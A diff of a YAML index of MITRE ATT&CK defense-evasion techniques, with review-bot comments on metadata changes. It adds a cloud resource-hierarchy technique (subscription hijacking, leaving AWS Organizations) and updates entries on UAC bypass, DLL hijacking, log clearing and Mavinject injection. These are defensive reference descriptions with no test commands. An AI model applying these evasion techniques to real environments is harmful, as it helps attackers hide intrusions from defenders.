+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
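Review bot: the new T1666 entry closes with `atomic_tests: []` and has no `identifier:` line, while the neighbouring T1006 and T1564.008 entries carry `identifier: T1006` and `identifier: T1564.008` immediately before their `atomic_tests`. Other entries in this file (T1027.013, T1578, T1542.003) also lack the key, so the generator emits it inconsistently; pick one convention and apply it uniformly, because anything that resolves a technique by `identifier` rather than by the map key will miss T1666. The entry is otherwise a faithful copy of the upstream object (`x_mitre_detection: ''`, single `defense-evasion` phase, `IaaS` platform), so no further change is needed there.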
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
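Review bot: `Office 365` and `Google Workspace` are collapsed into a single `Office Suite` platform for T1564.008 here, and the same consolidation happens later in this patch for T1564 (`Office 365` to `Office Suite`) and T1484.002 (`Azure AD` and `SaaS` to `Identity Provider`). Any per-platform index derived from `x_mitre_platforms` has to be regenerated in the same change, and consumers that filter on the old platform names will silently get empty results; list the renamed platforms in the PR description so those filters can be updated.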
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
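Review bot: at `- modified: '2023-05-09T14:00:00.188Z'` / `+ modified: '2023-03-30T21:01:50.568Z'` the T1014 timestamp moves backwards by more than a month, and the same backward move repeats later in this patch for T1036.007, T1548.002, T1548.003, Mavinject, T1600, T1562.009, T1542.005, T1070.002, T1218.004, T1553.001, T1222.001, T1218.007 and T1556.002. Every old value ends in `.188Z` and most share a `14:00:00` time of day, which looks like a release-wide batch stamp, whereas the new values are per-object. Confirm the generator now intentionally reads the object-level `modified` field and say so in the PR description, since anything that sorts or detects updates by `modified` will treat these as regressions.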
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
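Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed here for T1036.007 with nothing replacing it, whereas T1574.011 later in this patch has the same line removed and then `x_mitre_attack_spec_version: 3.2.0` added back at the end of its entry. The same replacement-free removal occurs for T1548.003, T1600, T1562.009, T1542.005, T1070.002 and T1218.004. If the upstream objects for these techniques genuinely carry no attack spec version, state that in the PR; otherwise the generator is losing the field for entries whose key order differs from the majority.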
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
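Review bot: the Mandiant M-Trends 2020 reference is repointed to a path under `/sites/default/files/2021-09/` while `Retrieved April 24, 2020.` is kept on the lines above, so the retrieval date predates the document's location by more than a year. The other URL updates in this patch (the `twitter.com` to `x.com` changes) refresh the retrieved date together with the URL; this one should do the same, or be left as upstream provides it and flagged there.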
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
